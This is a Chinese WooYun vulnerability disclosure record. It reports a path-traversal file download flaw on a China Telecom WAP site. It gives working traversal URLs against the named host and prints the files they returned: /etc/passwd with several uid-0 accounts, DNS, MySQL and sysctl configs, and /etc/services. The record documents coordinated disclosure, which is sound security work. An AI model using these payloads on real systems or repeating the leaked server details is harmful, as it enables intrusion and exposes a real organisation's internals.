漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-045675
漏洞标题:中国电信#中国电信分站任意文件下载
相关厂商:中国电信
漏洞作者: HackBraid
提交时间:2013-12-12 16:05
修复时间:2014-01-26 16:05
公开时间:2014-01-26 16:05
漏洞类型:任意文件遍历/下载
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-12: 细节已通知厂商并且等待厂商处理中
2013-12-17: 厂商已经确认,细节仅向厂商公开
2013-12-27: 细节向核心白帽子及相关领域专家公开
2014-01-06: 细节向普通白帽子公开
2014-01-16: 细节向实习白帽子公开
2014-01-26: 细节向公众公开
简要描述:
RT
详细说明:
漏洞点:http://wap.118114.cn 所在的主域名是翼游旅行网
一、测试passwd文件,可以看出用户不少啊!
http://wap.118114.cn/bst/star/c.jsp?fr=bst&t=../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinsquid:x:23:23::/var/spool/squid:/sbin/nologinwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinpegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologinlujingyun:x:0:0::/home/jiangyong:/bin/bashxunjian:x:0:0::/home/xunjian:/bin/bashzhouwen:x:0:0::/home/luwenqiang:/bin/bash
二、查看DNS
http://wap.118114.cn/bst/star/c.jsp?fr=bst&t=../../../../../../../../etc/resolv.conf
nameserver 202.96.209.133#nameserver 202.96.209.5
三、查看mysql配置文件,得到路径、password敏感信息
http://wap.118114.cn/bst/star/c.jsp?fr=bst&t=../../../../../../../../etc/my.cnf
[mysqld]datadir=/var/lib/mysqlsocket=/var/lib/mysql/mysql.sockuser=mysql
# Default to using old password format for compatibility with mysql 3.x
# clients (those using the mysqlclient10 compatibility package).old_passwords=1
[mysqld_safe]err-log=/var/log/mysqld.logpid-file=/var/run/mysqld/mysqld.pid
四、查看服务器内核信息
http://wap.118114.cn/bst/star/c.jsp?fr=bst&t=../../../../../../../../etc/sysctl.conf
# Kernel sysctl configuration file for Red Hat Linux
## For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and
# sysctl.conf(5) for more details.
# Controls IP packet forwardingnet.ipv4.ip_forward = 0
# Controls source route verificationnet.ipv4.conf.default.rp_filter = 1
# Do not accept source routingnet.ipv4.conf.default.accept_source_route = 0
# Controls the System Request debugging functionality of the kernelkernel.sysrq = 0
# Controls whether core dumps will append the PID to the core filename.
# Useful for debugging multi-threaded applications.
kernel.core_uses_pid = 1fs.
file-max = 812000fs.
inode-max = 131072net.
ipv4.tcp_tw_reuse = 1net.
ipv4.tcp_tw_recycle =1net.ipv4.
tcp_syncookies=1net.
ipv4.tcp_fin_timeout=30net.
ipv4.tcp_keepalive_time=1800net.
ipv4.tcp_max_syn_backlog=819
五、开启的服务及对应的端口,这个在编辑状态下看的还是很清楚的,另附截图
# /etc/services:# $Id: services,v 1.40 2004/09/23 05:45:18 notting Exp $## Network services, Internet style## Note that it is presently the policy of IANA to assign a single well-known# port number for both TCP and UDP; hence, most entries here have two entries# even if the protocol doesn't support UDP operations.# Updated from RFC 1700, ``Assigned Numbers'' (October 1994). Not all ports# are included, only the more common ones.## The latest IANA port assignments can be gotten from# http://www.iana.org/assignments/port-numbers# The Well Known Ports are those from 0 through 1023.# The Registered Ports are those from 1024 through 49151# The Dynamic and/or Private Ports are those from 49152 through 65535## Each line describes one service, and is of the form:# # service-name port/protocol [aliases ...] [# comment]tcpmux 1/tcp # TCP port service multiplexertcpmux 1/udp # TCP port service multiplexerrje 5/tcp # Remote Job Entryrje 5/udp # Remote Job Entryecho 7/tcpecho 7/udpdiscard 9/tcp sink nulldiscard 9/udp sink nullsystat 11/tcp userssystat 11/udp usersdaytime 13/tcpdaytime 13/udpqotd 17/tcp quoteqotd 17/udp quotemsp 18/tcp # message send protocolmsp 18/udp # message send protocolchargen 19/tcp ttytst sourcechargen 19/udp ttytst sourceftp-data 20/tcpftp-data 20/udp# 21 is registered to ftp, but also used by fspftp 21/tcpftp 21/udp fsp fspdssh 22/tcp # SSH Remote Login Protocolssh 22/udp # SSH Remote Login Protocoltelnet 23/tcptelnet 23/udp# 24 - private mail systemlmtp 24/tcp # LMTP Mail Deliverylmtp 24/udp # LMTP Mail Deliverysmtp 25/tcp mailsmtp 25/udp mailtime 37/tcp timservertime 37/udp timserverrlp 39/tcp resource # resource locationrlp 39/udp resource # resource locationnameserver 42/tcp name # IEN 116nameserver 42/udp name # IEN 116nicname 43/tcp whoisnicname 43/udp whoistacacs 49/tcp # Login Host Protocol (TACACS)tacacs 49/udp # Login Host Protocol (TACACS)re-mail-ck 50/tcp # Remote Mail Checking Protocolre-mail-ck 50/udp # Remote Mail Checking Protocoldomain 53/tcp # name-domain serverdomain 53/udpwhois++ 63/tcpwhois++ 63/udpbootps 67/tcp # BOOTP serverbootps 67/udpbootpc 68/tcp # BOOTP clientbootpc 68/udptftp 69/tcptftp 69/udpgopher 70/tcp # Internet Gophergopher 70/udpnetrjs-1 71/tcp # Remote Job Servicenetrjs-1 71/udp # Remote Job Servicenetrjs-2 72/tcp # Remote Job Servicenetrjs-2 72/udp # Remote Job Servicenetrjs-3 73/tcp # Remote Job Servicenetrjs-3 73/udp # Remote Job Servicenetrjs-4 74/tcp # Remote Job Servicenetrjs-4 74/udp # Remote Job Servicefinger 79/tcpfinger 79/udphttp 80/tcp www www-http # WorldWideWeb HTTPhttp 80/udp www www-http # HyperText Transfer Protocolkerberos 88/tcp kerberos5 krb5 # Kerberos v5kerberos 88/udp kerberos5 krb5 # Kerberos v5supdup 95/tcpsupdup 95/udphostname 101/tcp hostnames # usually from sri-nichostname 101/udp hostnames # usually from sri-niciso-tsap 102/tcp tsap # part of ISODE.csnet-ns 105/tcp cso # also used by CSO name servercsnet-ns 105/udp cso# unfortunately the poppassd (Eudora) uses a port which has already# been assigned to a different service. We list the poppassd as an# alias here. This should work for programs asking for this service.# (due to a bug in inetd the 3com-tsmux line is disabled)#3com-tsmux 106/tcp poppassd#3com-tsmux 106/udp poppassdrtelnet 107/tcp # Remote Telnetrtelnet 107/udppop2 109/tcp pop-2 postoffice # POP version 2pop2 109/udp pop-2pop3 110/tcp pop-3 # POP version 3pop3 110/udp pop-3sunrpc 111/tcp portmapper # RPC 4.0 portmapper TCPsunrpc 111/udp portmapper # RPC 4.0 portmapper UDPauth 113/tcp authentication tap identauth 113/udp authentication tap identsftp 115/tcpsftp 115/udpuucp-path 117/tcpuucp-path 117/udpnntp 119/tcp readnews untp # USENET News Transfer Protocolnntp 119/udp readnews untp # USENET News Transfer Protocolntp 123/tcpntp 123/udp # Network Time Protocolnetbios-ns 137/tcp # NETBIOS Name Servicenetbios-ns 137/udpnetbios-dgm 138/tcp # NETBIOS Datagram Servicenetbios-dgm 138/udpnetbios-ssn 139/tcp # NETBIOS session servicenetbios-ssn 139/udpimap 143/tcp imap2 # Interim Mail Access Proto v2imap 143/udp imap2snmp 161/tcp # Simple Net Mgmt Protosnmp 161/udp # Simple Net Mgmt Protosnmptrap 162/udp snmp-trap # Traps for SNMPcmip-man 163/tcp # ISO mgmt over IP (CMOT)cmip-man 163/udpcmip-agent 164/tcpcmip-agent 164/udpmailq 174/tcp # MAILQmailq 174/udp # MAILQxdmcp 177/tcp # X Display Mgr. Control Protoxdmcp 177/udpnextstep 178/tcp NeXTStep NextStep # NeXTStep windownextstep 178/udp NeXTStep NextStep # serverbgp 179/tcp # Border Gateway Proto.bgp 179/udpprospero 191/tcp # Cliff Neuman's Prosperoprospero 191/udpirc 194/tcp # Internet Relay Chatirc 194/udpsmux 199/tcp # SNMP Unix Multiplexersmux 199/udpat-rtmp 201/tcp # AppleTalk routingat-rtmp 201/udpat-nbp 202/tcp # AppleTalk name bindingat-nbp 202/udpat-echo 204/tcp # AppleTalk echoat-echo 204/udpat-zis 206/tcp # AppleTalk zone informationat-zis 206/udpqmtp 209/tcp # Quick Mail Transfer Protocolqmtp 209/udp # Quick Mail Transfer Protocolz39.50 210/tcp z3950 wais # NISO Z39.50 database z39.50 210/udp z3950 waisipx 213/tcp # IPXipx 213/udpimap3 220/tcp # Interactive Mail Accessimap3 220/udp # Protocol v3link 245/tcp ttylinklink 245/udp ttylinkfatserv 347/tcp # Fatmen Serverfatserv 347/udp # Fatmen Serverrsvp_tunnel 363/tcprsvp_tunnel 363/udpodmr 366/tcp # odmr required by fetchmailodmr 366/udp # odmr required by fetchmailrpc2portmap 369/tcprpc2portmap 369/udp # Coda portmappercodaauth2 370/tcpcodaauth2 370/udp # Coda authentication serverulistproc 372/tcp ulistserv # UNIX Listservulistproc 372/udp ulistservldap 389/tcpldap 389/udpsvrloc 427/tcp # Server Location Protoclsvrloc 427/udp # Server Location Protoclmobileip-agent 434/tcpmobileip-agent 434/udpmobilip-mn 435/tcpmobilip-mn 435/udphttps 443/tcp # MComhttps 443/udp # MComsnpp 444/tcp # Simple Network Paging Protocolsnpp 444/udp # Simple Network Paging Protocolmicrosoft-ds 445/tcpmicrosoft-ds 445/udpkpasswd 464/tcp kpwd # Kerberos "passwd"kpasswd 464/udp kpwd # Kerberos "passwd"photuris 468/tcpphoturis 468/udpsaft 487/tcp # Simple Asynchronous File Transfersaft 487/udp # Simple Asynchronous File Transfergss-http 488/tcpgss-http 488/udppim-rp-disc 496/tcppim-rp-disc 496/udpisakmp 500/tcpisakmp 500/udpgdomap 538/tcp # GNUstep distributed objectsgdomap 538/udp # GNUstep distributed objectsiiop 535/tcpiiop 535/udpdhcpv6-client 546/tcpdhcpv6-client 546/udpdhcpv6-server 547/tcpdhcpv6-server 547/udprtsp 554/tcp # Real Time Stream Control Protocolrtsp 554/udp # Real Time Stream Control Protocolnntps 563/tcp # NNTP over SSLnntps 563/udp # NNTP over SSLwhoami 565/tcpwhoami 565/udpsubmission 587/tcp msa # mail message submissionsubmission 587/udp msa # mail message submissionnpmp-local 610/tcp dqs313_qmaster # npmp-local / DQSnpmp-local 610/udp dqs313_qmaster # npmp-local / DQSnpmp-gui 611/tcp dqs313_execd # npmp-gui / DQSnpmp-gui 611/udp dqs313_execd # npmp-gui / DQShmmp-ind 612/tcp dqs313_intercell # HMMP Indication / DQShmmp-ind 612/udp dqs313_intercell # HMMP Indication / DQSipp 631/tcp # Internet Printing Protocolipp 631/udp # Internet Printing Protocolldaps 636/tcp # LDAP over SSLldaps 636/udp # LDAP over SSLacap 674/tcpacap 674/udpha-cluster 694/tcp # Heartbeat HA-clusterha-cluster 694/udp # Heartbeat HA-clusterkerberos-adm 749/tcp # Kerberos `kadmin' (v5)kerberos-iv 750/udp kerberos4 kerberos-sec kdckerberos-iv 750/tcp kerberos4 kerberos-sec kdcwebster 765/tcp # Network dictionarywebster 765/udpphonebook 767/tcp # Network phonebookphonebook 767/udprsync 873/tcp # rsyncrsync 873/udp # rsynctelnets 992/tcptelnets 992/udpimaps 993/tcp # IMAP over SSLimaps 993/udp # IMAP over SSLircs 994/tcpircs 994/udppop3s 995/tcp # POP-3 over SSLpop3s 995/udp # POP-3 over SSL## UNIX specific services#exec 512/tcpbiff 512/udp comsatlogin 513/tcpwho 513/udp whodshell 514/tcp cmd # no passwords usedsyslog 514/udpprinter 515/tcp spooler # line printer spoolerprinter 515/udp spooler # line printer spoolertalk 517/udpntalk 518/udputime 519/tcp unixtimeutime 519/udp unixtimeefs 520/tcprouter 520/udp route routed # RIPripng 521/tcpripng 521/udptimed 525/tcp timeservertimed 525/udp timeservertempo 526/tcp newdatecourier 530/tcp rpcconference 531/tcp chatnetnews 532/tcpnetwall 533/udp # -for emergency broadcastsuucp 540/tcp uucpd # uucp daemonklogin 543/tcp # Kerberized `rlogin' (v5)kshell 544/tcp krcmd # Kerberized `rsh' (v5)afpovertcp 548/tcp # AFP over TCPafpovertcp 548/udp # AFP over TCPremotefs 556/tcp rfs_server rfs # Brunhoff remote filesystem## From ``PORT NUMBERS'':##>REGISTERED PORT NUMBERS#>#>The Registered Ports are listed by the IANA and on most systems can be#>used by ordinary user processes or programs executed by ordinary#>users.#>#>Ports are used in the TCP [RFC793] to name the ends of logical#>connections which carry long term conversations. For the purpose of#>providing services to unknown callers, a service contact port is#>defined. This list specifies the port used by the server process as#>its contact port.#>#>The IANA registers uses of these ports as a convienence to the#>community.#socks 1080/tcp # socks proxy serversocks 1080/udp # socks proxy server# Port 1236 is registered as `bvcontrol', but is also used by the# Gracilis Packeten remote config server. The official name is listed as# the primary name, with the unregistered name as an alias.bvcontrol 1236/tcp rmtcfg # Daniel J. Walsh, Gracilis Packeten remote config serverbvcontrol 1236/udp # Daniel J. Walshh323hostcallsc 1300/tcp # H323 Host Call Secureh323hostcallsc 1300/udp # H323 Host Call Securems-sql-s 1433/tcp # Microsoft-SQL-Server ms-sql-s 1433/udp # Microsoft-SQL-Server ms-sql-m 1434/tcp # Microsoft-SQL-Monitorms-sql-m 1434/udp # Microsoft-SQL-Monitor ica 1494/tcp # Citrix ICA Clientica 1494/udp # Citrix ICA Clientwins 1512/tcp # Microsoft's Windows Internet Name Servicewins 1512/udp # Microsoft's Windows Internet Name Serviceingreslock 1524/tcpingreslock 1524/udpprospero-np 1525/tcp # Prospero non-privilegedprospero-np 1525/udpdatametrics 1645/tcp old-radius # datametrics / old radius entrydatametrics 1645/udp old-radius # datametrics / old radius entrysa-msg-port 1646/tcp old-radacct # sa-msg-port / old radacct entrysa-msg-port 1646/udp old-radacct # sa-msg-port / old radacct entrykermit 1649/tcpkermit 1649/udpl2tp 1701/tcp l2fl2tp 1701/udp l2fh323gatedisc 1718/tcph323gatedisc 1718/udph323gatestat 1719/tcph323gatestat 1719/udph323hostcall 1720/tcph323hostcall 1720/udptftp-mcast 1758/tcptftp-mcast 1758/udpmtftp 1759/udphello 1789/tcphello 1789/udpradius 1812/tcp # Radiusradius 1812/udp # Radiusradius-acct 1813/tcp radacct # Radius Accountingradius-acct 1813/udp radacct # Radius Accountingmtp 1911/tcp #mtp 1911/udp #hsrp 1985/tcp # Cisco Hot Standby Router Protocolhsrp 1985/udp # Cisco Hot Standby Router Protocollicensedaemon 1986/tcplicensedaemon 1986/udpgdp-port 1997/tcp # Cisco Gateway Discovery Protocolgdp-port 1997/udp # Cisco Gateway Discovery Protocolsieve 2000/tcp # Sieve Mail Filter Daemonsieve 2000/udp # Sieve Mail Filter Daemonnfs 2049/tcp nfsdnfs 2049/udp nfsdzephyr-srv 2102/tcp # Zephyr serverzephyr-srv 2102/udp # Zephyr serverzephyr-clt 2103/tcp # Zephyr serv-hm connectionzephyr-clt 2103/udp # Zephyr serv-hm connectionzephyr-hm 2104/tcp # Zephyr hostmanagerzephyr-hm 2104/udp # Zephyr hostmanagercvspserver 2401/tcp # CVS client/server operationscvspserver 2401/udp # CVS client/server operationsvenus 2430/tcp # codacon portvenus 2430/udp # Venus callback/wbc interfacevenus-se 2431/tcp # tcp side effectsvenus-se 2431/udp # udp sftp side effectcodasrv 2432/tcp # not usedcodasrv 2432/udp # server portcodasrv-se 2433/tcp # tcp side effectscodasrv-se 2433/udp # udp sftp side effectQ# Ports numbered 2600 through 2606 are used by the zebra package without# being registred. The primary names are the registered names, and the# unregistered names used by zebra are listed as aliases.hpstgmgr 2600/tcp zebrasrv # HPSTGMGRhpstgmgr 2600/udp # HPSTGMGRdiscp-client 2601/tcp zebra # discp clientdiscp-client 2601/udp # discp clientdiscp-server 2602/tcp ripd # discp serverdiscp-server 2602/udp # discp serverservicemeter 2603/tcp ripngd # Service Meterservicemeter 2603/udp # Service Meternsc-ccs 2604/tcp ospfd # NSC CCSnsc-ccs 2604/udp # NSC CCSnsc-posa 2605/tcp bgpd # NSC POSAnsc-posa 2605/udp # NSC POSAnetmon 2606/tcp ospf6d # Dell Netmonnetmon 2606/udp # Dell Netmondict 2628/tcp # RFC 2229dict 2628/udp # RFC 2229corbaloc 2809/tcp # CORBA naming service locatoricpv2 3130/tcp # Internet Cache Protocol V2 (Squid)icpv2 3130/udp # Internet Cache Protocol V2 (Squid)mysql 3306/tcp # MySQLmysql 3306/udp # MySQLtrnsprntproxy 3346/tcp # Trnsprnt Proxytrnsprntproxy 3346/udp # Trnsprnt Proxypxe 4011/udp # PXE serverfud 4201/udp # Cyrus IMAP FUD Daemonrwhois 4321/tcp # Remote Who Isrwhois 4321/udp # Remote Who Iskrb524 4444/tcp # Kerberos 5 to 4 ticket xlatorkrb524 4444/udp # Kerberos 5 to 4 ticket xlatorrfe 5002/tcp # Radio Free Ethernetrfe 5002/udp # Actually uses UDP onlycfengine 5308/tcp # CFenginecfengine 5308/udp # CFenginecvsup 5999/tcp CVSup # CVSup file transfer/John Polstra/FreeBSDcvsup 5999/udp CVSup # CVSup file transfer/John Polstra/FreeBSDx11 6000/tcp X # the X Window Systemafs3-fileserver 7000/tcp # file server itselfafs3-fileserver 7000/udp # file server itselfafs3-callback 7001/tcp # callbacks to cache managersafs3-callback 7001/udp # callbacks to cache managersafs3-prserver 7002/tcp # users & groups databaseafs3-prserver 7002/udp # users & groups databaseafs3-vlserver 7003/tcp # volume location databaseafs3-vlserver 7003/udp # volume location databaseafs3-kaserver 7004/tcp # AFS/Kerberos authentication serviceafs3-kaserver 7004/udp # AFS/Kerberos authentication serviceafs3-volser 7005/tcp # volume managment serverafs3-volser 7005/udp # volume managment serverafs3-errors 7006/tcp # error interpretation serviceafs3-errors 7006/udp # error interpretation serviceafs3-bos 7007/tcp # basic overseer processafs3-bos 7007/udp # basic overseer processafs3-update 7008/tcp # server-to-server updaterafs3-update 7008/udp # server-to-server updaterafs3-rmtsys 7009/tcp # remote cache manager serviceafs3-rmtsys 7009/udp # remote cache manager servicesd 9876/tcp # Session Directorsd 9876/udp # Session Directoramanda 10080/tcp # amanda backup servicesamanda 10080/udp # amanda backup servicespgpkeyserver 11371/tcp # PGP/GPG public keyserverpgpkeyserver 11371/udp # PGP/GPG public keyserverh323callsigalt 11720/tcp # H323 Call Signal Alternateh323callsigalt 11720/udp # H323 Call Signal Alternatebprd 13720/tcp # BPRD (VERITAS NetBackup)bprd 13720/udp # BPRD (VERITAS NetBackup)bpdbm 13721/tcp # BPDBM (VERITAS NetBackup)bpdbm 13721/udp # BPDBM (VERITAS NetBackup)bpjava-msvc 13722/tcp # BP Java MSVC Protocolbpjava-msvc 13722/udp # BP Java MSVC Protocolvnetd 13724/tcp # Veritas Network Utilityvnetd 13724/udp # Veritas Network Utilitybpcd 13782/tcp # VERITAS NetBackupbpcd 13782/udp # VERITAS NetBackupvopied 13783/tcp # VOPIED Protocolvopied 13783/udp # VOPIED Protocol# This port is registered as wnn6, but also used under the unregistered name# "wnn4" by the FreeWnn package.wnn6 22273/tcp wnn4wnn6 22273/udp wnn4quake 26000/tcpquake 26000/udpwnn6-ds 26208/tcpwnn6-ds 26208/udptraceroute 33434/tcptraceroute 33434/udp## Datagram Delivery Protocol services#rtmp 1/ddp # Routing Table Maintenance Protocolnbp 2/ddp # Name Binding Protocolecho 4/ddp # AppleTalk Echo Protocolzip 6/ddp # Zone Information Protocol## Kerberos (Project Athena/MIT) services# Note that these are for Kerberos v4, and are unregistered/unofficial. Sites# running v4 should uncomment these and comment out the v5 entries above.#kerberos_master 751/udp # Kerberos authenticationkerberos_master 751/tcp # Kerberos authenticationpasswd_server 752/udp # Kerberos passwd serverkrbupdate 760/tcp kreg # Kerberos registrationkpop 1109/tcp # Pop with Kerberosknetd 2053/tcp # Kerberos de-multiplexor## Kerberos 5 services, also not registered with IANA#krb5_prop 754/tcp # Kerberos slave propagationeklogin 2105/tcp # Kerberos encrypted rlogin## Unregistered but necessary(?) (for NetBSD) services#supfilesrv 871/tcp # SUP serversupfiledbg 1127/tcp # SUP debugging## Unregistered but useful/necessary other services#netstat 15/tcp # (was once asssigned, no more)linuxconf 98/tcp # Linuxconf HTML accesspoppassd 106/tcp # Eudorapoppassd 106/udp # Eudorasmtps 465/tcp # SMTP over SSL (TLS)gii 616/tcp # gated interactive interfaceomirr 808/tcp omirrd # online mirroromirr 808/udp omirrd # online mirrorswat 901/tcp # Samba Web Administration Toolrndc 953/tcp # rndc control sockets (BIND 9)rndc 953/udp # rndc control sockets (BIND 9)skkserv 1178/tcp # SKK Japanese input methodxtel 1313/tcp # french minitelsupport 1529/tcp prmsd gnatsd # GNATS, cygnus bug trackercfinger 2003/tcp # GNU Fingerninstall 2150/tcp # ninstall serviceninstall 2150/udp # ninstall serviceafbackup 2988/tcp # Afbackup systemafbackup 2988/udp # Afbackup systemsquid 3128/tcp # squid web proxyprsvp 3455/tcp # RSVP Portprsvp 3455/udp # RSVP Portdistcc 3632/tcp # distccsvn 3690/tcp # Subversionsvn 3690/udp # Subversionpostgres 5432/tcp # POSTGRESpostgres 5432/udp # POSTGRESfax 4557/tcp # FAX transmission service (old)hylafax 4559/tcp # HylaFAX client-server protocol (new)sgi-dgl 5232/tcp # SGI Distributed Graphicssgi-dgl 5232/udpnoclog 5354/tcp # noclogd with TCP (nocol)noclog 5354/udp # noclogd with UDP (nocol)hostmon 5355/tcp # hostmon uses TCP (nocol)hostmon 5355/udp # hostmon uses TCP (nocol)canna 5680/tcpx11-ssh-offset 6010/tcp # SSH X11 forwarding offsetircd 6667/tcp # Internet Relay Chatircd 6667/udp # Internet Relay Chatxfs 7100/tcp # X font servertircproxy 7666/tcp # Tircproxyhttp-alt 8008/tcphttp-alt 8008/udpwebcache 8080/tcp # WWW caching servicewebcache 8080/udp # WWW caching servicetproxy 8081/tcp # Transparent Proxytproxy 8081/udp # Transparent Proxyjetdirect 9100/tcp laserjet hplj #mandelspawn 9359/udp mandelbrot # network mandelbrotkamanda 10081/tcp # amanda backup services (Kerberos)kamanda 10081/udp # amanda backup services (Kerberos)amandaidx 10082/tcp # amanda backup servicesamidxtape 10083/tcp # amanda backup servicesisdnlog 20011/tcp # isdn logging systemisdnlog 20011/udp # isdn logging systemvboxd 20012/tcp # voice box systemvboxd 20012/udp # voice box systemwnn4_Kr 22305/tcp # used by the kWnn packagewnn4_Cn 22289/tcp # used by the cWnn packagewnn4_Tw 22321/tcp # used by the tWnn packagebinkp 24554/tcp # Binkleybinkp 24554/udp # Binkleyasp 27374/tcp # Address Search Protocolasp 27374/udp # Address Search Protocoltfido 60177/tcp # Ifmailtfido 60177/udp # Ifmailfido 60179/tcp # Ifmailfido 60179/udp # Ifmail# Local services
漏洞证明:
修复方案:
版权声明:转载请注明来源 HackBraid@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2013-12-17 08:52
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT直接通报中国电信集团公司处置。
最新状态:
暂无